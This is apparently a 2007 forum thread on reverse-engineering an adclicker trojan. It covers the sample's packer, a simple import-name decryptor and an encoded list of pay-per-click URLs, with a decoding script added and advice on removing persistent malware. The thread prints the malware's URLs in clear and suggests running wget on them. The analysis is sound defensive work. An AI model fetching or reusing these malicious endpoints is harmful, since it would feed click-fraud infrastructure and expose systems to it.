truly i don't give a damn what kind of packer it is, as i never go for premade tools (i mean unpackers, OEP finders, protection identifiers and their ilk)

i tend to muddle my way through myself

yeah, your guess could be right; if it was real FSG then possibly the FSG string has been erased
and if you notice while unpacking it you will see a homebrewed
import string decryptor (although it's lame: it just changed the first character of every import name, so it will take GxitProcess
and convert it to ExitProcess before getting the proc address via LoadLibrary() GetProcAddress()) (i don't think real FSG did all that trickery; also if i remember well FSG didn't have that kind of jump to OEP in its original version and didn't check for some hardcoded const on its way over there)


well, like McAfee said it's an adclicker; that means it fetches or redirects your queries and clicks on the advertisements on those sites, which would fetch the zombies' revenue on those murky pay-per-click sites

@LLXX
get into the binary a little and you will see what string is appended to the URL (it's decrypted and appended with lstrcat())

or try a detour on lstrcat down deep below and log them and
run wget on those URLs

if you notice my strings output you will see the URLs with lots of = including the img_gen URL in clear

a sample output before decryption
Code:

""""18iuuq;..bnmns/bhjmnq/hogn.bij/qiq>pp<n*rnmd*lhn"18iuuq;..wnoq`hou/bnqhshfiu/nsf.bij/qiq>pp<ctx*c`cx*bshc"12iuuq;..tobk/rdoeunch{/hogn.rd`sbi/qiq>p<f`sedohof*fhgu*rqdbh`m"14iuuq;..gdde/kduihmmr/nsf.bij/qiq>pp<odv*{d`m`oe*fhgu"19iuuq;..uidsd`mm/sd`mqshou/hogn.ylmrd`sbi/qiq>j<bmnrhof*uid*`bihdwdldou*f`q"10iuuq;..knjd/vhohofr/o`ld.ylmrd`sbi/qiq>j<b`mhgnsoh`*u`y*qsdq`sds*cnoe"19iuuq;..ushq3/unxq`sur/hogn.ylmrd`sbi/qiq>j<knc*otsrd*rddjds"14iuuq;..cl/rdoeunch{/hogn.bij/qiq>pp<fbd*m*n*sdrtmu"15iuuq;..31758/rdoeunch{/hogn.ylmrd`sbi/qiq>j<bmnrhof*uid*f`q"


after decryption

Code:

0042289B ####09http://color.ciklop.info/chk.php?qq=o+sole+mio#09http://vo
004228DB npaint.copiright.org/chk.php?qq=buy+baby+crib#03http://uncj.send
0042291B tobiz.info/search.php?q=gardening+gift+special#05http://feed.jet
0042295B hills.org/chk.php?qq=new+zealand+gift#08http://thereall.realprin
0042299B t.info/xmlsearch.php?k=closing+the+achievement+gap#01http://joke
004229DB .winings.name/xmlsearch.php?k=california+tax+preparer+bond#08htt
00422A1B p://trip2.toyparts.info/xmlsearch.php?k=job+nurse+seeker#05http:
00422A5B //bm.sendtobiz.info/chk.php?qq=gce+l+o+result#04http://20649.sen
00422A9B dtobiz.info/xmlsearch.php?k=closing+the+gap#


also, just by looking at the input and output i think you can guess the algorithm used

Silkut
January 17th, 2007, 10:35
Caesar rotation with one move to the right, ROT1 :-?

blabberer
January 17th, 2007, 12:18
@silkut
test your hypothesis here
it will have an online decoder for all the ciphers

http://www.antilles.k12.vi.us/math/cryptotut/home.htm

Silkut
January 17th, 2007, 12:50
@blabberer: thanks for the link.
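
The before/after pair blabberer posted is enough to pin the transform down, and Silkut's Caesar guess can be checked against the same bytes. Added example, not code from the thread or the sample's own routine: the posted ciphertext reproduces the posted plaintext when every byte is XORed with 1 (a low-bit flip, which is why 'i' becomes 'h' but 'n' becomes 'o', something a one-position shift cannot do); the record splitter and the ROT helper are mine, and the meaning of the two-digit prefix on each record is not established anywhere in the thread.

```python
"""Decode the URL list blabberer dumps above. The 'before decryption' blob
becomes the 'after decryption' text when each byte is XORed with 1."""

# Ciphertext exactly as printed in the thread (one line there; split here).
CIPHERTEXT = (
    '""""18iuuq;..bnmns/bhjmnq/hogn.bij/qiq>pp<n*rnmd*lhn'
    '"18iuuq;..wnoq`hou/bnqhshfiu/nsf.bij/qiq>pp<ctx*c`cx*bshc'
    '"12iuuq;..tobk/rdoeunch{/hogn.rd`sbi/qiq>p<f`sedohof*fhgu*rqdbh`m'
    '"14iuuq;..gdde/kduihmmr/nsf.bij/qiq>pp<odv*{d`m`oe*fhgu'
    '"19iuuq;..uidsd`mm/sd`mqshou/hogn.ylmrd`sbi/qiq>j<bmnrhof*uid*`bihdwdldou*f`q'
    '"10iuuq;..knjd/vhohofr/o`ld.ylmrd`sbi/qiq>j<b`mhgnsoh`*u`y*qsdq`sds*cnoe'
    '"19iuuq;..ushq3/unxq`sur/hogn.ylmrd`sbi/qiq>j<knc*otsrd*rddjds'
    '"14iuuq;..cl/rdoeunch{/hogn.bij/qiq>pp<fbd*m*n*sdrtmu'
    '"15iuuq;..31758/rdoeunch{/hogn.ylmrd`sbi/qiq>j<bmnrhof*uid*f`q"'
)


def xor1(text):
    """The transform the sample uses: flip the low bit of every byte.
    It is an involution, so the same call encrypts and decrypts."""
    return bytes(b ^ 1 for b in text.encode("latin-1")).decode("latin-1")


def rot1_left(text):
    """Silkut's hypothesis: a Caesar shift by one position, letters only.
    Kept so both hypotheses can be run over the same input."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") - 1) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") - 1) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def split_records(plaintext):
    """The decrypted blob is '#'-separated; each record is a two-digit
    prefix (purpose unknown from the thread) followed by a URL."""
    records = []
    for field in plaintext.split("#"):
        if len(field) > 2 and field[:2].isdigit():
            records.append((field[:2], field[2:]))
    return records


def decode_sample():
    """(prefix, url) pairs recovered from the thread's sample."""
    return split_records(xor1(CIPHERTEXT))


if __name__ == "__main__":
    # A Caesar shift turns "bnmns" into "amlmr", not "color"; XOR 1 does.
    print("rot1:", rot1_left(CIPHERTEXT[:52]))
    print("xor1:", xor1(CIPHERTEXT[:52]))
    for prefix, url in decode_sample():
        print(prefix, url)
```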

owl
January 19th, 2007, 10:29
Most malware will create a separate process that will be started automatically every time you reboot your system. This process will check to see if it is already installed; if not, it will re-install itself. That is why it keeps coming back every time you remove it. If you knew the process name, you could just go to the services file and change it from automatic start to manual start, or just delete that file.

Usually the name of the process is not that obvious; they tend to masquerade it as some valid Microsoft file. The best way of finding it is by using something like Process Monitor or any other process and registry monitor. Re-install the original malware and see which files it is creating; this will give you a good indication of what to look at.